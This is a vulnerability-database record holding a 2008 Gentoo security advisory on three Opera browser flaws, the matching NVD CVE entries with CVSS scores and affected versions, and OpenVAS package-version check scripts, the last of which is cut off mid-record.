{"id": "SECURITYVULNS:DOC:19659", "bulletinFamily": "software", "title": "[ GLSA 200804-14 ] Opera: Multiple vulnerabilities", "description": "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nGentoo Linux Security Advisory GLSA 200804-14\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n http://security.gentoo.org/\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n Severity: Normal\r\n Title: Opera: Multiple vulnerabilities\r\n Date: April 14, 2008\r\n Bugs: #216022\r\n ID: 200804-14\r\n\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\nSynopsis\r\n========\r\n\r\nMultiple vulnerabilities have been discovered in Opera, allowing for\r\nexecution of arbitrary code.\r\n\r\nBackground\r\n==========\r\n\r\nOpera is a fast web browser that is available free of charge.\r\n\r\nAffected packages\r\n=================\r\n\r\n -------------------------------------------------------------------\r\n Package / Vulnerable / Unaffected\r\n -------------------------------------------------------------------\r\n 1 www-client/opera < 9.27 >= 9.27\r\n\r\nDescription\r\n===========\r\n\r\nMichal Zalewski reported two vulnerabilities, memory corruption when\r\nadding news feed sources from a website (CVE-2008-1761) as well as when\r\nprocessing HTML CANVAS elements to use scaled images (CVE-2008-1762).\r\nAdditionally, an unspecified weakness related to keyboard handling of\r\npassword inputs has been reported (CVE-2008-1764).\r\n\r\nImpact\r\n======\r\n\r\nA remote attacker could entice a user to visit a specially crafted web\r\nsite or news feed and possibly execute arbitrary code with the\r\nprivileges of the user running Opera.\r\n\r\nWorkaround\r\n==========\r\n\r\nThere is no known workaround at this time.\r\n\r\nResolution\r\n==========\r\n\r\nAll Opera users should upgrade to the latest version:\r\n\r\n # emerge --sync\r\n # emerge --ask --oneshot --verbose ">=www-client/opera-9.27"\r\n\r\nReferences\r\n==========\r\n\r\n [ 1 ] CVE-2008-1761\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1761\r\n [ 2 ] CVE-2008-1762\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1762\r\n [ 3 ] CVE-2008-1764\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1764\r\n\r\nAvailability\r\n============\r\n\r\nThis GLSA and any updates to it are available for viewing at\r\nthe Gentoo Security Website:\r\n\r\n http://security.gentoo.org/glsa/glsa-200804-14.xml\r\n\r\nConcerns?\r\n=========\r\n\r\nSecurity is a primary focus of Gentoo Linux and ensuring the\r\nconfidentiality and security of our users machines is of utmost\r\nimportance to us. Any security concerns should be addressed to\r\nsecurity@gentoo.org or alternatively, you may file a bug at\r\nhttp://bugs.gentoo.org.\r\n\r\nLicense\r\n=======\r\n\r\nCopyright 2008 Gentoo Foundation, Inc; referenced text\r\nbelongs to its owner(s).\r\n\r\nThe contents of this document are licensed under the\r\nCreative Commons - Attribution / Share Alike license.\r\n\r\nhttp://creativecommons.org/licenses/by-sa/2.5", "published": "2008-04-15T00:00:00", "modified": "2008-04-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19659", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2008-1764", "CVE-2008-1762", "CVE-2008-1761"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:26", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": 8.2, "vector": "NONE", "modified": "2018-08-31T11:10:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-1761", "CVE-2008-1762", "CVE-2008-1764"]}, {"type": "gentoo", "idList": ["GLSA-200804-14"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8908"]}, {"type": "openvas", "idList": ["OPENVAS:60839", "OPENVAS:60814"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-200804-14.NASL", "FREEBSD_PKG_AD4A00FA015711DD8BD3001372AE3AB9.NASL", "OPERA_927.NASL"]}, {"type": "freebsd", "idList": ["AD4A00FA-0157-11DD-8BD3-001372AE3AB9"]}, {"type": "exploitdb", "idList": ["EDB-ID:31594"]}], "modified": "2018-08-31T11:10:26", "rev": 2}, "vulnersScore": 8.2}, "affectedSoftware": []}

{"cve": [{"lastseen": "2021-02-02T05:35:13", "description": "Opera before 9.27 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted newsfeed source, which triggers an invalid memory access.", "edition": 6, "cvss3": {}, "published": "2008-04-12T20:05:00", "title": "CVE-2008-1761", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1761"], "modified": "2017-08-08T01:30:00", "cpe": ["cpe:/a:opera:opera:9.20", "cpe:/a:opera:opera:9.23", "cpe:/a:opera:opera:9.25", "cpe:/a:opera:opera:9.24", "cpe:/a:opera:opera:9.26", "cpe:/a:opera:opera:9.10", "cpe:/a:opera:opera:9.22", "cpe:/a:opera:opera:9.02", "cpe:/a:opera:opera:9.21"], "id": "CVE-2008-1761", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1761", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:opera:opera:9.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.24:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.26:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.25:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:13", "description": "Unspecified vulnerability in Opera before 9.27 has unknown impact and attack vectors related to \"keyboard handling of password inputs.\"", "edition": 8, "cvss3": {}, "published": "2008-04-12T20:05:00", "title": "CVE-2008-1764", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1764"], "modified": "2017-08-08T01:30:00", "cpe": ["cpe:/a:opera:opera:7.20", "cpe:/a:opera:opera:5.3", "cpe:/a:opera:opera:9.20", "cpe:/a:opera:opera:8.52", "cpe:/a:opera:opera:7.22", "cpe:/a:opera:opera:8.54", "cpe:/a:opera:opera:5.10", "cpe:/a:opera:opera:9.23", "cpe:/a:opera:opera:9.25", "cpe:/a:opera:opera:7.23", "cpe:/a:opera:opera:6.02", "cpe:/a:opera:opera:5..10", "cpe:/a:opera:opera:5.12", "cpe:/a:opera:opera:8.02", "cpe:/a:opera:opera:6.1", "cpe:/a:opera:opera:5.2", "cpe:/a:opera:opera:5.6", "cpe:/a:opera:opera:5.0", "cpe:/a:opera:opera:9.24", "cpe:/a:opera:opera:7", "cpe:/a:opera:opera:7.21", "cpe:/a:opera:opera:7.11", "cpe:/a:opera:opera:6.11", "cpe:/a:opera:opera:5.5", "cpe:/a:opera:opera:9.6", "cpe:/a:opera:opera:9.1tp", "cpe:/a:opera:opera:8.0", "cpe:/a:opera:opera:7.54", "cpe:/a:opera:opera:7.02", "cpe:/a:opera:opera:7.30", "cpe:/a:opera:opera:7.50", "cpe:/a:opera:opera:9.26", "cpe:/a:opera:opera:5.02", "cpe:/a:opera:opera:7.52", "cpe:/a:opera:opera:6", "cpe:/a:opera:opera:6.03", "cpe:/a:opera:opera:5.8", "cpe:/a:opera:opera:6.05", "cpe:/a:opera:opera:6.01", "cpe:/a:opera:opera:9.10", "cpe:/a:opera:opera:6.04", "cpe:/a:opera:opera:7.03", "cpe:/a:opera:opera:5.11", "cpe:/a:opera:opera:8.01", "cpe:/a:opera:opera:7.01", "cpe:/a:opera:opera:8.51", "cpe:/a:opera:opera:6.06", "cpe:/a:opera:opera:7.0", "cpe:/a:opera:opera:5.4", "cpe:/a:opera:opera:5.1", "cpe:/a:opera:opera:9.22", "cpe:/a:opera:opera:7.55", "cpe:/a:opera:opera:8.53", "cpe:/a:opera:opera:5.7", "cpe:/a:opera:opera:7.53", "cpe:/a:opera:opera:9.0", "cpe:/a:opera:opera:7.51", "cpe:/a:opera:opera:9.02", "cpe:/a:opera:opera:5.9", "cpe:/a:opera:opera:6.0", "cpe:/a:opera:opera:7.10", "cpe:/a:opera:opera:9.21", "cpe:/a:opera:opera:6.12", "cpe:/a:opera:opera:9.01", "cpe:/a:opera:opera:8.50"], "id": "CVE-2008-1764", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1764", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:opera:opera:5.0:beta_5:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.0:beta_7:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.20:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.24:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.0:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.0:beta_2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.3:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.03:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.0:beta_2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.30:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.26:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.0:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.0:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.54:update_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.50:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.7:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.0:beta_2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5..10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.5:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.6:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.53:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.0:beta_3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.55:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.0:beta_4:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.03:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.6:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.0:beta_3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.0:beta_8:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.9:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.05:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.8:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.0:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.0:beta_3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.1tp:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.20:beta7:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.54:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.0:beta_6:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.0:beta_1v2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.25:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.0:beta_2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.04:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.54:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.0:beta_2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.06:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7:beta_1.2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.54:update_2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.51:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:13", "description": "Opera before 9.27 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted scaled image pattern in an HTML CANVAS element, which triggers memory corruption.", "edition": 8, "cvss3": {}, "published": "2008-04-12T20:05:00", "title": "CVE-2008-1762", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1762"], "modified": "2017-08-08T01:30:00", "cpe": ["cpe:/a:opera:opera_browser:8.53", "cpe:/a:opera:opera_browser:7.21", "cpe:/a:opera:opera_browser:6.1", "cpe:/a:opera:opera_browser:7.50", "cpe:/a:opera:opera_browser:7.03", "cpe:/a:opera:opera_browser:5.11", "cpe:/a:opera:opera_browser:8.0", "cpe:/a:opera:opera_browser:8.54", "cpe:/a:opera:opera_browser:7.51", "cpe:/a:opera:opera_browser:7.22", "cpe:/a:opera:opera_browser:8.50", "cpe:/a:opera:opera_browser:6.06", "cpe:/a:opera:opera_browser:9.0", "cpe:/a:opera:opera_browser:9.20", "cpe:/a:opera:opera_browser:7.20", "cpe:/a:opera:opera_browser:7.0", "cpe:/a:opera:opera_browser:9.26", "cpe:/a:opera:opera_browser:6.11", "cpe:/a:opera:opera_browser:9.23", "cpe:/a:opera:opera_browser:8.02", "cpe:/a:opera:opera_browser:6.02", "cpe:/a:opera:opera_browser:5.02", "cpe:/a:opera:opera_browser:5.0", "cpe:/a:opera:opera_browser:8.51", "cpe:/a:opera:opera_browser:8.01", "cpe:/a:opera:opera_browser:9.25", "cpe:/a:opera:opera_browser:6.04", "cpe:/a:opera:opera_browser:6.01", "cpe:/a:opera:opera_browser:9.21", "cpe:/a:opera:opera_browser:6.03", "cpe:/a:opera:opera_browser:9.12", "cpe:/a:opera:opera_browser:9.24", "cpe:/a:opera:opera_browser:7.52", "cpe:/a:opera:opera_browser:7.54", "cpe:/a:opera:opera_browser:7.60", "cpe:/a:opera:opera_browser:6.12", "cpe:/a:opera:opera_browser:6.0", "cpe:/a:opera:opera_browser:7.10", "cpe:/a:opera:opera_browser:7.53", "cpe:/a:opera:opera_browser:5.10", "cpe:/a:opera:opera_browser:5.12", "cpe:/a:opera:opera_browser:7.01", "cpe:/a:opera:opera_browser:9.02", "cpe:/a:opera:opera_browser:9.22", "cpe:/a:opera:opera_browser:8.52", "cpe:/a:opera:opera_browser:9.10", "cpe:/a:opera:opera_browser:9.01", "cpe:/a:opera:opera_browser:6.05", "cpe:/a:opera:opera_browser:7.02", "cpe:/a:opera:opera_browser:7.11", "cpe:/a:opera:opera_browser:7.23"], "id": "CVE-2008-1762", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1762", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:opera:opera_browser:8.54:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.50:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:update2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta6:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.25:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:update1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta7:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.04:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.20:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.06:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.53:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta1_v2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.26:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.05:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.10:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.24:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.20:beta7:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.11:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.03:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.03:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.1:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta8:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta3:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:50:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1764", "CVE-2008-1762", "CVE-2008-1761"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200804-14.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:60814", "href": "http://plugins.openvas.org/nasl.php?oid=60814", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200804-14 (opera)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been discovered in Opera, allowing for\nexecution of arbitrary code.\";\ntag_solution = \"All Opera users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/opera-9.27'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200804-14\nhttp://bugs.gentoo.org/show_bug.cgi?id=216022\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200804-14.\";\n\n \n\nif(description)\n{\n script_id(60814);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2008-1761\", \"CVE-2008-1762\", \"CVE-2008-1764\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200804-14 (opera)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"www-client/opera\", unaffected: make_list(\"ge 9.27\"), vulnerable: make_list(\"lt 9.27\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1762", "CVE-2008-1761"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-26T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:60839", "href": "http://plugins.openvas.org/nasl.php?oid=60839", "type": "openvas", "title": "FreeBSD Ports: opera", "sourceData": "#\n#VID ad4a00fa-0157-11dd-8bd3-001372ae3ab9\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated 